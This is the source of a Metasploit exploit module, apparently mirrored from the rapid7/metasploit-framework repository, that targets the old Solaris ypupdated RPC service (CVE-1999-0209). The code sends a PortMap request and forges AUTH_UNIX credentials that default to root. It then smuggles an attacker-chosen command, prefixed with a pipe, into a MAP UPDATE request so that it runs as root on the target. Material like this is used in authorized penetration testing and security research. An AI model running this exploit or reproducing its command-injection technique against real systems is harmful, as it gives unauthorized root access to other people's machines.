Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'English'

7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::Remote::SunRPC

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Solaris ypupdated Command Execution',

17
        'Description' => %q{

18
          This exploit targets a weakness in the way the ypupdated RPC

19
          application uses the command shell when handling a MAP UPDATE

20
          request.  Extra commands may be launched through this command

21
          shell, which runs as root on the remote host, by passing

22
          commands in the format '|<command>'.

23


24
          Vulnerable systems include Solaris 2.7, 8, 9, and 10, when

25
          ypupdated is started with the '-i' command-line option.

26
        },

27
        'Author' => [ 'I)ruid <druid[at]caughq.org>' ],

28
        'License' => MSF_LICENSE,

29
        'References' => [

30
          ['CVE', '1999-0209'],

31
          ['OSVDB', '11517'],

32
          ['BID', '1749'],

33
        ],

34
        'Privileged' => true,

35
        'Platform' => %w[solaris unix],

36
        'Arch' => ARCH_CMD,

37
        'Payload' => {

38
          'Space' => 1024,

39
          'DisableNops' => true,

40
          'Compat' => {

41
            'PayloadType' => 'cmd',

42
            'RequiredCmd' => 'generic perl telnet'

43
          }

44
        },

45
        'Targets' => [ ['Automatic', {}], ],

46
        'DefaultTarget' => 0,

47
        'DisclosureDate' => '1994-12-12',

48
        'Notes' => {

49
          'Stability' => [CRASH_SAFE],

50
          'Reliability' => [REPEATABLE_SESSION],

51
          'SideEffects' => [IOC_IN_LOGS]

52
        }

53
      )

54
    )

55


56
    register_options([

57
      OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),

58
      OptInt.new('GID', [false, 'GID to emulate', 0]),

59
      OptInt.new('UID', [false, 'UID to emulate', 0])

60
    ])

61
  end

62


63
  def exploit

64
    hostname = datastore['HOSTNAME']

65
    program = 100028

66
    progver = 1

67
    procedure = 1

68


69
    print_status('Sending PortMap request for ypupdated program')

70
    sunrpc_create('udp', program, progver)

71


72
    print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")

73
    print_status('Waiting for response...')

74
    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])

75
    command = '|' + payload.encoded

76
    msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)

77
    sunrpc_call(procedure, msg)

78


79
    sunrpc_destroy

80


81
    print_status('No Errors, appears to have succeeded!')

82
  rescue ::Rex::Proto::SunRPC::RPCTimeout

83
    print_warning('Warning: ' + $ERROR_INFO)

84
  end

85
end

86


87